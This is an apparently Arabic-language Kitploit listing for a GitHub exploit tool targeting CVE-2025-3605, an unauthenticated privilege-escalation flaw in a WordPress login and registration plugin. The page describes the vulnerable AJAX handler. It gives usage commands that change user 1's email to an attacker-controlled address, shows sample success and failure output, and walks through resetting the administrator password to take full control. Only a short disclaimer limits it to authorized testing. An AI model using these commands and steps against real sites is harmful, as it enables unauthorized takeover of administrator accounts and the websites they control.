Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-3605 — إضافة WordPress Frontend Login and Registration Blocks Plugin ذات الإصدار 1.0.7 أو أقل معرضة لتصعيد الامتيازات | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-3605
تصعيد الامتيازاتهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-3605

CVE-2025-3605

إضافة WordPress Frontend Login and Registration Blocks Plugin ذات الإصدار 1.0.7 أو أقل معرضة لتصعيد الامتيازات

عرض المستودع
23منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚀 دليل استغلال CVE-2025-3605

🛡️ ملخص الثغرة

إضافة Frontend Login and Registration Blocks لووردبريس (الإصدارات <= 1.0.7) معرضة لـ تصعيد الامتيازات عبر الاستيلاء على الحساب.
تنشأ المشكلة لأن الإضافة لا تتحقق من هوية المستخدم عند تحديث التفاصيل الحساسة مثل البريد الإلكتروني عبر دالة flr_blocks_user_settings_handle_ajax_callback().

✅ التأثير:
يمكن لمهاجم غير مصادق تغيير البريد الإلكتروني للمسؤول، وتشغيل عملية "نسيت كلمة المرور"، وإعادة تعيين كلمة مرور المسؤول، مما يمنحه السيطرة الكاملة.


💥 إثبات المفهوم (PoC)

يقوم السكريبت البرمجي المضمن بلغة بايثون بأتمتة عملية الاستغلال من خلال استهداف نقطة نهاية AJAX المعرضة للخطر:

root@kitploit:~
/wp-admin/admin-ajax.php

يقوم بتحديث البريد الإلكتروني للمستخدم المستهدف (عادةً user_id 1 للمسؤول) إلى بريد إلكتروني يتحكم فيه المهاجم.


📦 السكريبت المضمن

اسم الملف: CVE-2025-3605.py

root@kitploit:~
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]

✅ القيم الافتراضية:

  • --user_id: 1 (المسؤول الافتراضي)
  • --mail: [email protected]

🖥️ الاستخدام والمساعدة

لعرض قائمة المساعدة، قم بتشغيل:

root@kitploit:~
python CVE-2025-3605.py --help

المخرجات:

root@kitploit:~
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]

Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target URL, e.g., http://192.168.100.74:888/wordpress
  --user_id, -id USER_ID
                        User ID to target (default: 1)
  --mail, -mail MAIL    Email to set (default: [email protected])

✅ مثال تشغيل:

root@kitploit:~
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]

🎯 المخرجات المتوقعة

✅ عند النجاح:

root@kitploit:~
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )

❌ عند الفشل:

root@kitploit:~
[!] Exploit failed. HTTP Status: 400
[!] Response: 0

🔑 بعد الاستغلال

1️⃣ انتقل إلى:

root@kitploit:~
http://target-site/wordpress/wp-login.php

2️⃣ أدخل البريد الإلكتروني الجديد الذي قمت بتعيينه ([email protected]).

3️⃣ اطلب إعادة تعيين كلمة المرور.

4️⃣ قم بتعيين كلمة مرور جديدة.

5️⃣ سجل الدخول كـ مسؤول واستمتع بالوصول الكامل.


⚠️ إخلاء المسؤولية

يتم توفير هذا الاستغلال والسكريبت لأغراض تعليمية واختبارية مصرح بها فقط.
أي استخدام غير مصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها هو غير قانوني وغير أخلاقي.


بواسطة: Khaled Alenazi (Nxploited)

تنزيل الأداة